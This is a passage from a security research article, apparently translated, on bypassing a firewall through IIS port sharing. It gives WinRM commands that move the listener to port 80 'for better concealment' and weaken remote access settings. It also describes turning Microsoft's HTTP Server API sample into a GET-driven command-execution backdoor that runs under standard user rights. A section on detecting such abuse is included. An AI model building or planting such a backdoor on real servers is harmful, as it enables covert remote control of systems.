API\u003C\u002Fli>\u003Cli>Exploitation methods targeting ports 80 and 443\u003C\u002Fli>\u003Cli>Exploitation methods for high and low privileges\u003C\u002Fli>\u003Cli>Detection methods\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Basic Concepts\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. HTTP.sys and Port Sharing\u003C\u002Fh3>\u003Cp>Microsoft introduced the kernel-mode driver (Http.sys) in Windows 2003 Server to listen for HTTP traffic and process it based on URLs, allowing any user process to share TCP ports dedicated to HTTP traffic.\u003C\u002Fp>\u003Cp>In other words, through HTTP.sys, multiple processes will be able to listen for HTTP traffic on the same port.\u003C\u002Fp>\u003Cp>The Netsh command can be used to query and configure HTTP.sys settings and parameters. Reference materials are as follows:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fwindows\u002Fwin32\u002Fhttp\u002Fnetsh-commands-for-http\u003C\u002Fp>\u003Cp>To list all URL DACLs, use the following command:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>netsh http show urlacl\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The system includes 10 DACLs by default, two of which correspond to the WinRM service. Specific information is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>    Reserved URL            : http:\u002F\u002F+:5985\u002Fwsman\u002F\u003Cbr>        User: NT SERVICE\\WinRM\u003Cbr>            Listen: Yes\u003Cbr>            Delegate: No\u003Cbr>        User: NT SERVICE\\Wecsvc\u003Cbr>            Listen: Yes\u003Cbr>            Delegate: No\u003Cbr>            SDDL: D:(A;;GX;;;S-1-5-80-569256582-2953403351-2909559716-1301513147\u003Cbr>-412116970)(A;;GX;;;S-1-5-80-4059739203-877974739-1245631912-527174227-299656351\u003Cbr>7)\u003Cbr>\u003Cbr>    Reserved URL            : https:\u002F\u002F+:5986\u002Fwsman\u002F\u003Cbr>        User: NT SERVICE\\WinRM\u003Cbr>            Listen: Yes\u003Cbr>            Delegate: No\u003Cbr>        User: NT SERVICE\\Wecsvc\u003Cbr>            Listen: Yes\u003Cbr>            Delegate: No\u003Cbr>            SDDL: D:(A;;GX;;;S-1-5-80-569256582-2953403351-2909559716-1301513147\u003Cbr>-412116970)(A;;GX;;;S-1-5-80-4059739203-877974739-1245631912-527174227-299656351\u003Cbr>7)\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Port 5985 corresponds to HTTP, port 5986 corresponds to HTTPS\u003C\u002Fp>\u003Ch3>2. WinRM Service\u003C\u002Fh3>\u003Cp>Learning Materials:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fwindows\u002Fwin32\u002Fwinrm\u002Fportal\u003C\u002Fp>\u003Cp>Full name: Windows Remote Management, capable of executing commands on remote hosts\u003C\u002Fp>\u003Ch3>3. HTTP Server API\u003C\u002Fh3>\u003Cp>Learning Materials:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fwindows\u002Fwin32\u002Fhttp\u002Fhttp-api-start-page\u003C\u002Fp>\u003Cp>HTTP Server API enables applications to receive HTTP requests directed to URLs and send HTTP responses\u003C\u002Fp>\u003Ch2>0x03 Utilizing WinRM Service for Port Reuse\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Twi1ight's article has already covered this content. Thanks for his sharing. The address is as follows:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fpaper.seebug.org\u002F1004\u002F\u003C\u002Fp>\u003Cp>This section only summarizes and organizes the content from that article with slight additions\u003C\u002Fp>\u003Cp>Windows Server 2008 has WinRM service disabled by default, Windows Server 2012 has it enabled by default\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The following operations require administrator privileges.\u003C\u002Fp>\u003Ch3>1. If the WinRM service is already enabled on the system\u003C\u002Fh3>\u003Ch4>(1) Check the listener configuration\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>winrm e winrm\u002Fconfig\u002Flistener\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>By default, it listens on port 5985. To avoid modifying the default configuration, we need to add port 80 here.\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The command to view WinRM configuration is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>winrm get winrm\u002Fconfig\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>(2) Add port 80\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>winrm set winrm\u002Fconfig\u002Fservice @{EnableCompatibilityHttpListener=\"true\"}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Additional note:\u003C\u002Fp>\u003Cp>The command to remove port 80 is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>winrm set winrm\u002Fconfig\u002Fservice @{EnableCompatibilityHttpListener=\"false\"}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>If port 80 is not added, remote connections must specify port 5985, as shown in the following example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>winrs -r:http:\u002F\u002F192.168.112.129:5985 -u:test -p:1234 \"whoami\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>(3) Allow all accounts in the Administrators group to access the service\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System \u002Fv LocalAccountTokenFilterPolicy \u002Ft REG_DWORD \u002Fd 1 \u002Ff\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>If this setting is not configured, only the built-in Administrator account can be used for remote connections.\u003C\u002Fp>\u003Ch3>2. If the WinRM service is not enabled on the system\u003C\u002Fh3>\u003Ch4>(1) Enable and configure the service using default settings\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Winrm quickconfig -q\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>This will automatically perform the following actions:\u003C\u002Fp>\u003Cul>\u003Cli>Start the WinRM service and set its startup type to automatic\u003C\u002Fli>\u003Cli>Add listener configuration\u003C\u002Fli>\u003Cli>Add firewall rules\u003C\u002Fli>\u003C\u002Ful>\u003Ch4>(2) Modify the default port\u003C\u002Fh4>\u003Cp>After enabling the service, it listens on port 5985 by default. For better concealment, change the default port from 5985 to port 80.\u003C\u002Fp>\u003Cp>Change the default HTTP port to 80:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>winrm set winrm\u002Fconfig\u002FListener?Address=*+Transport=HTTP @{Port=\"80\"}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The command to restore the default HTTP port to 5985 is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>winrm set winrm\u002Fconfig\u002FListener?Address=*+Transport=HTTP @{Port=\"5985\"}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>(3) Allow all accounts in the Administrators group to access the service\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System \u002Fv LocalAccountTokenFilterPolicy \u002Ft REG_DWORD \u002Fd 1 \u002Ff\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>If this is not set, only the built-in administrator account Administrator can be used for remote connections\u003C\u002Fp>\u003Ch3>3. Connect to the remote host via the WinRM service\u003C\u002Fh3>\u003Cp>The local system needs to use the same language environment as the remote host\u003C\u002Fp>\u003Ch4>(1) Enable the WinRM service on the local system\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Winrm quickconfig -q\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>(2) Set access rules on the local system to allow connections to all hosts\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>winrm set winrm\u002Fconfig\u002FClient @{TrustedHosts=\"*\"}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The command to delete this access rule is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>winrm set winrm\u002Fconfig\u002FClient @{TrustedHosts=\"\"}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>(3) Example command for connecting to a remote host\u003C\u002Fh4>\u003Cp>If using the default port 5985, the command is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>winrs -r:http:\u002F\u002F192.168.112.129:5985 -u:administrator -p:1234 \"whoami\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>If using port 80, the command is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>winrs -r:http:\u002F\u002F192.168.112.129 -u:administrator -p:1234 \"whoami\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch2>0x04 Port Reuse via HTTP Server API\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Sample Code Testing\u003C\u002Fh3>\u003Cp>Download link:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fwindows\u002Fwin32\u002Fhttp\u002Fhttp-server-sample-application\u003C\u002Fp>\u003Cp>The code supports registering multiple URLs simultaneously, processing requests, and sending HTTP responses.\u003C\u002Fp>\u003Cp>Simple test as follows:\u003C\u002Fp>\u003Cp>Server IP is 192.168.112.129\u003C\u002Fp>\u003Cp>Execute with administrator privileges:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>http-server-sample-application.exe http:\u002F\u002F+:80\u002FMyUri1 http:\u002F\u002F+:80\u002FMyUri2\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Open browser and visit http:\u002F\u002F192.168.112.129:80\u002FMyUri1 and http:\u002F\u002F192.168.112.129:80\u002FMyUri2 respectively\u003C\u002Fp>\u003Cp>The received results are shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770016711387_0_34b90b3715-1.jpeg\">\u003C\u002Fp>\u003Cp>The sample code registers the URL as Listen On via API HttpAddUrl(). Under default configuration, administrator privileges are required for successful addition; otherwise error occurs: HttpAddUrl failed with 5, indicating insufficient permissions\u003C\u002Fp>\u003Cp>However, normal operation under standard user privileges can be achieved by adding url acl (requires administrator privileges)\u003C\u002Fp>\u003Ch3>2. Enable sample code to run with standard user privileges by adding url acl (requires administrator privileges)\u003C\u002Fh3>\u003Cp>Method as follows:\u003C\u002Fp>\u003Cp>Add url acl, granting Everyone user permissions for specified URL, command as follows (administrator privileges):\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>netsh http add urlacl url=http:\u002F\u002F+:80\u002FMyUri user=everyone\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Command to delete this url acl is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>netsh http delete urlacl url=http:\u002F\u002F+:80\u002FMyUri\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Execute the test program again (with standard user privileges), command as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>http-server-sample-application.exe http:\u002F\u002F+:80\u002FMyUri\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Execution successful\u003C\u002Fp>\u003Ch3>3. Utilize existing URL ACLs to run the sample code with standard user privileges\u003C\u002Fh3>\u003Cp>List all URL DACLs, command as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>netsh http show urlacl\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Note that under default configuration, the following ACL is included:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp> Reserved URL            : http:\u002F\u002F+:80\u002FTemporary_Listen_Addresses\u002F\u003Cbr>       User: \\Everyone\u003Cbr>           Listen: Yes\u003Cbr>           Delegate: No\u003Cbr>           SDDL: D:(A;;GX;;;WD)\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>User is Everyone, so we can leverage this URL\u003C\u002Fp>\u003Cp>Execute the sample program (with standard user privileges), command as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>http-server-sample-application.exe http:\u002F\u002F+:80\u002FTemporary_Listen_Addresses\u002FMyUri\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Execution successful\u003C\u002Fp>\u003Ch3>4. Modify the example code to implement command execution\u003C\u002Fh3>\u003Cp>Approach is as follows:\u003C\u002Fp>\u003Cp>Send the cmd command to be executed via a GET request, in the format ?\u003Ccommand>\u003C\u002Fcommand>\u003C\u002Fp>\u003Cp>For example: http:\u002F\u002F192.168.112.129\u002FMyUri?whoami, the command to be executed is whoami, reply with the execution result in the Response\u003C\u002Fp>\u003Cp>For GET and POST requests that do not conform to the format, reply with 404 in the Response\u003C\u002Fp>\u003Cp>Implementation code:\u003C\u002Fp>\u003Cp>Using the example program as a template, the following locations need to be modified:\u003C\u002Fp>\u003Ch4>(1) Use ? to pass parameters\u003C\u002Fh4>\u003Cp>pRequest-&gt;CookedUrl.pQueryString can read parameters, but includes the useless character ?, the first character of pRequest-&gt;CookedUrl.pQueryString needs to be removed when actually executing the command\u003C\u002Fp>\u003Cp>C code to remove the first character of pRequest-&gt;CookedUrl.pQueryString:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>WCHAR *QueryString = new WCHAR[pRequest-&gt;CookedUrl.QueryStringLength-1];\u003Cbr>wcsncpy_s(QueryString, wcslen(QueryString), pRequest-&gt;CookedUrl.pQueryString + 1, wcslen(QueryString) - 1);\u003Cbr>wprintf_s(L\"%s\\n\", QueryString);\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>(2) Replacement of special characters\u003C\u002Fh4>\u003Cul>\u003Cli>Spaces are encoded as %20\u003C\u002Fli>\u003Cli>\" is encoded as %22\u003C\u002Fli>\u003Cli>' is encoded as %27\u003C\u002Fli>\u003C\u002Ful>\u003Cp>For example, the browser input string 'whoami \u002Fall' will be encoded as 'whoami%20\u002Fall', and this command cannot be directly executed in the command line\u003C\u002Fp>\u003Cp>The C code for restoring URL encoding has been uploaded to GitHub, address as follows:\u003C\u002Fp>\u003Cp>An open-source project\u003C\u002Fp>\u003Cp>The code supports multi-byte character sets and Unicode character sets\u003C\u002Fp>\u003Ch4>(3) Use pipes to read commands and execute them, then return the results\u003C\u002Fh4>\u003Cp>The code for executing cmd commands using pipes and obtaining results has been uploaded to GitHub, address as follows:\u003C\u002Fp>\u003Cp>An open-source project\u003C\u002Fp>\u003Ch4>(4) Modify the format of the returned results\u003C\u002Fh4>\u003Cp>The returned results need to be formatted, converting the \\n newline character to \u003Cbr> in HTML; otherwise, the content displayed in the browser will not wrap\u003C\u002Fp>\u003Cp>The code for converting newline characters (\\n) in text to HTML line breaks (\u003Cbr>) has been uploaded to GitHub, address as follows:\u003C\u002Fp>\u003Cp>An open-source project\u003C\u002Fp>\u003Cp>The final implemented code has been uploaded to GitHub, address as follows:\u003C\u002Fp>\u003Cp>An open-source project\u003C\u002Fp>\u003Cp>Only URLs of a specific format can execute commands, otherwise a 404 error is displayed\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770016716192_1_e174b4365e-1.jpeg\">\u003C\u002Fp>\u003Cp>Command example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>http:\u002F\u002F192.168.112.129\u002FMyUri?net%20start\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770016721649_2_af6c64a71a-1.jpeg\">\u003C\u002Fp>\u003Cp>HTTPS protocol is also supported, command example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>https:\u002F\u002F192.168.112.129\u002FMyUri?net%20start\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770016728050_3_b792bcf698-1.jpeg\">\u003C\u002Fp>\u003Ch2>0x05 Exploitation Method\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>The Windows server has the IIS service enabled, and the firewall only allows communication on ports 80 or 443. The method to achieve remote management of this server without using a webshell is as follows:\u003C\u002Fp>\u003Ch3>1. Using Administrator Privileges\u003C\u002Fh3>\u003Ch4>(1) Using WinRM Service\u003C\u002Fh4>\u003Cp>Requires enabling WinRM service\u003C\u002Fp>\u003Cp>Requires password or hash of an account in the Administrators group\u003C\u002Fp>\u003Ch4>(2) Using HTTP Server API\u003C\u002Fh4>\u003Cp>Can use any URL\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Both port 80 and 443 are available\u003C\u002Fp>\u003Ch3>2. Using Standard User Privileges\u003C\u002Fh3>\u003Ch4>(1) Using HTTP Server API\u003C\u002Fh4>\u003Cp>Using existing URL ACL: http:\u002F\u002F+:80\u002FTemporary_Listen_Addresses\u002F\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Cannot use port 443\u003C\u002Fp>\u003Ch2>0x06 Detection Methods\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Detect whether the port sharing feature of the current IIS server is being abused using the following methods\u003C\u002Fp>\u003Ch3>1. Detect the URLs in use\u003C\u002Fh3>\u003Cp>If the HTTP Server API is used, the program will register URLs during runtime. View the command as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>netsh http sh ser\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Suspicious result example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Server session ID: D000000020000174\u003Cbr>    Version: 1.0\u003Cbr>    State: Active\u003Cbr>    Properties:\u003Cbr>        Max bandwidth: 4294967295\u003Cbr>        Timeouts:\u003Cbr>            Entity body timeout (secs): 120\u003Cbr>            Drain entity body timeout (secs): 120\u003Cbr>            Request queue timeout (secs): 120\u003Cbr>            Idle connection timeout (secs): 120\u003Cbr>            Header wait timeout (secs): 120\u003Cbr>            Minimum send rate (bytes\u002Fsec): 150\u003Cbr>    URL groups:\u003Cbr>    URL group ID: AC0000004000017C\u003Cbr>        State: Active\u003Cbr>        Request queue name: Request queue is unnamed.\u003Cbr>        Properties:\u003Cbr>            Max bandwidth: inherited\u003Cbr>            Max connections: inherited\u003Cbr>            Timeouts:\u003Cbr>                Timeout values inherited\u003Cbr>            Number of registered URLs: 1\u003Cbr>            Registered URLs:\u003Cbr>                HTTP:\u002F\u002F192.168.112.129:80:192.168.112.129\u002FMYURI\u002F\u003Cbr>\u003Cbr>    Server session ID: D000000020000173\u003Cbr>    Version: 1.0\u003Cbr>    State: Active\u003Cbr>    Properties:\u003Cbr>        Max bandwidth: 4294967295\u003Cbr>        Timeouts:\u003Cbr>            Entity body timeout (secs): 120\u003Cbr>            Drain entity body timeout (secs): 120\u003Cbr>            Request queue timeout (secs): 120\u003Cbr>            Idle connection timeout (secs): 120\u003Cbr>            Header wait timeout (secs): 120\u003Cbr>            Minimum send rate (bytes\u002Fsec): 150\u003Cbr>    URL groups:\u003Cbr>    URL group ID: AC0000004000017B\u003Cbr>        State: Active\u003Cbr>        Request queue name: Request queue is unnamed.\u003Cbr>        Properties:\u003Cbr>            Max bandwidth: inherited\u003Cbr>            Max connections: inherited\u003Cbr>            Timeouts:\u003Cbr>                Timeout values inherited\u003Cbr>            Number of registered URLs: 1\u003Cbr>            Registered URLs:\u003Cbr>                HTTPS:\u002F\u002F192.168.112.129:443:192.168.112.129\u002FMYURI\u002F\u003Cbr>                \u003Cbr>Server session ID: D600000020000077\u003Cbr>    Version: 1.0\u003Cbr>    State: Active\u003Cbr>    Properties:\u003Cbr>        Max bandwidth: 4294967295\u003Cbr>        Timeouts:\u003Cbr>            Entity body timeout (secs): 120\u003Cbr>            Drain entity body timeout (secs): 120\u003Cbr>            Request queue timeout (secs): 120\u003Cbr>            Idle connection timeout (secs): 120\u003Cbr>            Header wait timeout (secs): 120\u003Cbr>            Minimum send rate (bytes\u002Fsec): 150\u003Cbr>    URL groups:\u003Cbr>    URL group ID: BF00000040000120\u003Cbr>        State: Active\u003Cbr>        Request queue name: Request queue is unnamed.\u003Cbr>        Properties:\u003Cbr>            Max bandwidth: inherited\u003Cbr>            Max connections: inherited\u003Cbr>            Timeouts:\u003Cbr>                Timeout values inherited\u003Cbr>            Number of registered URLs: 1\u003Cbr>            Registered URLs:\u003Cbr>                HTTP:\u002F\u002F+:80\u002FTEMPORARY_LISTEN_ADDRESSES\u002F\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>2. Check WinRM Service Configuration\u003C\u002Fh3>\u003Cp>If an attacker obtains administrator privileges, the WinRM service configuration could be abused\u003C\u002Fp>\u003Cp>Check listener configuration:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>winrm e winrm\u002Fconfig\u002Flistener\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Check if suspicious ports are open\u003C\u002Fp>\u003Ch2>0x07 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article addresses the following issue:\u003C\u002Fp>\u003Cp>A Windows server has IIS service enabled, and the firewall only allows communication on ports 80 or 443. How can remote management of this server be achieved without using webshells and with only regular user permissions?\u003C\u002Fp>\u003Cp>Solution:\u003C\u002Fp>\u003Cp>Use code:\u003C\u002Fp>\u003Cp>An open-source project\u003C\u002Fp>\u003Cp>Use existing URL ACLs with the following command parameters:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>HTTPServerWebshell.exe http:\u002F\u002F+:80\u002FTemporary_Listen_Addresses\u002F\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003C\u002Fbody>\u003C\u002Fhtml>",143,"Onedaysec",9,"published","2026-02-02T07:25:19.688Z",{"title":37,"description":14,"keywords":38,"ogImage":39,"canonicalUrl":39,"noIndex":40},"Bypass Firewall via IIS Port Sharing for Remote Management","firewall bypass, IIS port sharing, WinRM service, HTTP.sys, remote management, port 80, port 443, Windows server security",null,false,[],{"docs":43,"hasNextPage":40},[44,4,45,46],1124,1122,1121,{"title":39,"description":39,"image":39},"2026-07-24T15:37:09.417Z","2026-07-23T16:02:33.192Z","draft","2026-07-23T16:16:49.275Z"]